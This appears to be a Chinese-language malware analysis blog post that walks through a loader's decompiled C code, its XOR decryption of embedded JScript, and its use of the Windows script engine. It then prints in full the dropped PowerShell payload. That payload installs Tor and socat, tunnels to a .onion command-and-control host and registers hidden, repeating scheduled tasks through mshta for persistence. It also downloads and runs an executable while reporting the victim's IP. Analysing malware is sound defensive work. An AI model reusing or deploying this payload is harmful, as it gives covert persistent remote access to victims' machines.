int __cdecl main(int argc, const char argv, const char envp)
{ST20_4
JSEngine v4 ; //ST18_4
unsigned int i ; //[esp+1Ch] [ebp-14h]
encry_code *a2 ; //[esp+20h] [ebp-10h]
FreeConsole();
a2 = operator new ( 8u);
a2 ->size = 0x14C88;
a2 ->js_code = operator new[] ( a2->size);
for ( i = 0 ; i < a2 ->size; ++ i)
a2 ->js_code[ i ] = encrypt_code [ i];
decrypt_code ( a2 ->js_code, a2 ->size - 1);
v3 = operator new ( 0x10u);
memset ( v3 , 0x10u);
v4 = init_com ( v3);
run_jscript ( v4 , a2);
sub_862F90 ( v4);
return 0;
}解密方式也比较简单,主要就是通过xor来解密
_BYTE __cdecl decrypt_code(char a1, unsigned int size)
{edx
_BYTE result ; //eax
unsigned int v4 ; //[esp+0h] [ebp-1Ch]
_BYTE v5 ; //[esp+10h] [ebp-Ch]
unsigned int i ; //[esp+14h] [ebp-8h]
unsigned int j ; //[esp+18h] [ebp-4h]
= 0x7FFFFFFF - 8 fun ( size , 6);
result = operator new ( 1u);
v5 = result;
v2 = result;
LOBYTE ( result ) = 4 ; v2 = 4;
// 生成xor key
for ( i = 0 ; i < 4 ; ++ i)
{
v5 [ i ] = v4 >> 8 * i;
result = ( i + 1);
}
for ( j = 0 ; j < size ; ++ j)
{
result = ( v5 [ j % 4 ] ^ a1 [ j]);
a1 [ j ] = result;
}
return result;
}1. CoCreateInstance()创建javascript的引擎,获得jscript引擎的接口的IActiveScript 2. 实现回调调用接口IActiveScriptSite,通过IActiveScript->SetScriptSite()交给脚本回调 3. IActiveScript->QueryInterface()取得IActiveScriptParse接口,IActiveScriptParse接口用来解析执行jscript脚本
脚本会释放出一个powershell脚本,可能是c2c连接已经失效,后续的行为没跑出来
$SH_TYPE_SCHEDULED_TASK=1; $SH_TYPE_TASK_SCHEDULER=2; $schedulerType=$SH_TYPE_SCHEDULED_TASK; function FVRClsggMRAZ { param([string]$zipfile, [string]$destination); $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe'; if (-NOT (Test-Path $7z)){ Try { (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z); } Catch{} } if ($(Try { Test-Path $7z.trim() } Catch { $false })){ Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow } else{ $shell = new-object -com shell.application; $zip = $shell.NameSpace($zipfile); foreach($item in $zip.items()) { $shell.Namespace($destination).copyhere($item); } } } function Base64ToFile { param([string]$file, [string]$string); $bytes=[System.Convert]::FromBase64String($string); #set-content -encoding byte $file -value $bytes; [IO.File]::WriteAllBytes($file, $bytes); } function RandomString{ param([int]$min=5, [int]$max=15); return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_})); } function InitScheduller{ try{ Import-Module ScheduledTasks -ErrorAction Stop; return $SH_TYPE_SCHEDULED_TASK; }catch{ $File=$env:Temp+'/'+(RandomString)+'.zip'; $Dest=$env:Temp+'/'+(RandomString); while (!(iGgRLcyIJQBzrA 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {} if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null; FVRClsggMRAZ $File $Dest; Remove-Item -Force $File; $TSAssembly=$Dest+'/lib/net20/Microsoft.Win32.TaskScheduler.dll'; $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly); return $SH_TYPE_TASK_SCHEDULER; } } function xrnOlrj { param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir=''); switch ($schedulerType) { $SH_TYPE_SCHEDULED_TASK { $Action = New-ScheduledTaskAction -Execute $cmd; if(-Not [String]::IsNullOrEmpty($params)){ $Action.Arguments=$params; } if(-Not [String]::IsNullOrEmpty($dir)){ $Action.WorkingDirectory=$dir; } $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn; try{ $LogonTrigger.UserId=$env:username; }catch{ $LogonTrigger.User=$env:username; } if(-Not $delay -eq 0){ $LogonTrigger.Delay=New-TimeSpan -Seconds $delay; } if($restart -eq 1){ $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20)); } $Settings = New-ScheduledTaskSettingsSet; $Settings.DisallowStartIfOnBatteries = $False; $Settings.StopIfGoingOnBatteries = $False; if($restart -eq 1){ $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString); }else{ $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString); } Start-ScheduledTask -InputObject $Task; }; Default { $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService; $td=$ts.NewTask(); $td.RegistrationInfo.Description = (RandomString); $td.Settings.DisallowStartIfOnBatteries = $False; $td.Settings.StopIfGoingOnBatteries = $False; $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew; $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger; $LogonTrigger.StartBoundary=[System.DateTime]::Now; $LogonTrigger.UserId=$env:username; $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay); $td.Triggers.Add($LogonTrigger); if($restart -eq 1){ $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger; $TimeTrigger.StartBoundary=[System.DateTime]::Now; $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1); $TimeTrigger.Repetition.StopAtDurationEnd=$False; $td.Triggers.Add($TimeTrigger); } $tsf="Microsoft.Win32.TaskScheduler"; $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir); $td.Actions.Add($ExecAction); $task=$ts.RootFolder.RegisterTaskDefinition($name, $td); $task.Run(); }; } } function iGgRLcyIJQBzrA { param([string]$AETLcnitKnaNqr, [string]$aEntsBMtsayB); $ErrorActionPreference = "Stop"; Write-Host ("Download {0} to {1}" -f ($AETLcnitKnaNqr, $aEntsBMtsayB)); try { Start-BitsTransfer -Source $AETLcnitKnaNqr -Destination $aEntsBMtsayB; } catch { #Write-Error $_ -ErrorAction Continue; try { (New-Object System.Net.WebClient).DownloadFile($AETLcnitKnaNqr,$aEntsBMtsayB); } catch { #Write-Error $_ -ErrorAction Continue; Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$AETLcnitKnaNqr`" `"$aEntsBMtsayB`"" -Wait -WindowStyle Hidden; } }finally{ $ErrorActionPreference = "Continue"; } if ( $(Try { Test-Path $aEntsBMtsayB.trim() } Catch { $false })){ return $true; } return $false; } function IwoPMc{ $schedulerType = InitScheduller; $tf=$env:Temp+'/'+(RandomString)+'.zip'; $DestTP=$env:ALLUSERSPROFILE+'/'+(RandomString); $TorMirrors=@("https://dist.torproject.org/", "https://torproject.mirror.metalgamer.eu/dist/", "https://tor.ybti.net/dist/"); foreach ($mirror in $TorMirrors) { $_url=$mirror+'torbrowser/7.0.11/tor-win32-0.3.1.9.zip'; if((iGgRLcyIJQBzrA $_url $tf)){ break; } } if ((Test-Path $DestTP) -eq 1){Remove-Item -Force -Recurse $DestTP;}mkdir $DestTP | Out-Null; FVRClsggMRAZ $tf $DestTP; Remove-Item -Force $tf; $ykF=$DestTP+'/Tor/'; $WqPfv="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"tor.exe`",0,False))"; xrnOlrj (RandomString) 'mshta.exe' $WqPfv 0 0 $ykF; $SFile=$env:Temp+'/'+(RandomString)+'.zip'; while (!(iGgRLcyIJQBzrA 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $SFile)){} FVRClsggMRAZ $SFile $DestTP; $s_old=$DestTP+'/socat-windows-1.7.2.1/'; $s_new=(RandomString); Remove-Item -Force $SFile; Rename-Item -path $s_old -newName $s_new; $dLkdOdvs=$DestTP+'/'+$s_new+'/'; $s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:80,socksport=9050'; $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:5588,socksport=9050'; $SyASxV="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))"; $CkeHaEMoQb="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))"; xrnOlrj (RandomString) 'mshta.exe' $SyASxV 0 0 $dLkdOdvs; xrnOlrj (RandomString) 'mshta.exe' $CkeHaEMoQb 0 0 $dLkdOdvs; $wXdRbCFwn="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'//"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))"; xrnOlrj (RandomString) 'mshta.exe' $wXdRbCFwn 1; } IwoPMc;
纯属好玩
扫码打赏,你说多少就多少
打开 支付宝 扫一扫,即可进行扫码打赏哦